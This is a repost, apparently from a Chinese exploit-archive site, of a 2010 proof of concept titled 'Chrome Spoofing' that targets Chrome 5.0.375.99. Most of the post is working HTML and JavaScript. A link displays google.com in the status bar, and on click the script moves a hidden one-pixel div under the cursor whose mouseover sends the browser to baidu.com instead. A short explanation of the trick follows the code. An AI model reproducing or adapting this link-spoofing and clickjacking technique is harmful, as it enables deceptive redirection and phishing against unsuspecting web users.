首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Chrome Spoofing
来源:http://hi.baidu.com/zrxc/blog/ 作者:zrxc 发布时间:2010-07-26  
在Chrome 5.0.375.99下测试成功。

POC:

<html><head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>Demo</title>
</head>
<body>
<div id="sH" onmouseover="document.location='http://www.baidu.com';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 1px; height: 1px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div>

<script>
function spoof(evt)
{
clickjacking_mouseX=evt.pageX?evt.pageX:evt.clientX;
clickjacking_mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('sH').style.left=clickjacking_mouseX-0;
document.getElementById('sH').style.top=clickjacking_mouseY-0;
}
</script>

<center>
<br>
<center>
<h1><font face="Comic Sans MS">Chrome 5.0.375.99 ClickJacking POC</font></h1>
<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
<b><br><br>
<a href="http://www.google.com" onclick="spoof(event)">Go To The Google?</a></b>
</div>
<font face="Comic Sans MS">Have Fun :)</font>
</center>

</center></body></html>

效果:
—————————————————————————————————————————————————————————————————————————————————————————————————



当鼠标移到链接上时,状态栏依然显示http://www.google.com

当点击了链接后,页面会跳转到百度。

不知道你注意到图片左上角那仅有1像素的黑点没?秘密就在那里 :)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mediacoder v0.7.3.4682 (.m3u)
·Media Player Classic Heap Over
·DM Filemanager 3.9.11 Arbitrar
·IBM AIX 5l FTPd Remote DES Has
·Ubuntu 10.04 LTS - Lucid Lynx
·QQPlayer smi File Buffer Overf
·Easy FTP Server v1.7.0.11 LIST
·PunBB <= 1.3.4 and Pun_PM <= v
·Multiple Web Browser Clickjack
·IE6 / 7 Remote Dos vulnerabili
·ZipCentral (.zip) Buffer Overf
·Microsoft Visual Studio 6.0 (V
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved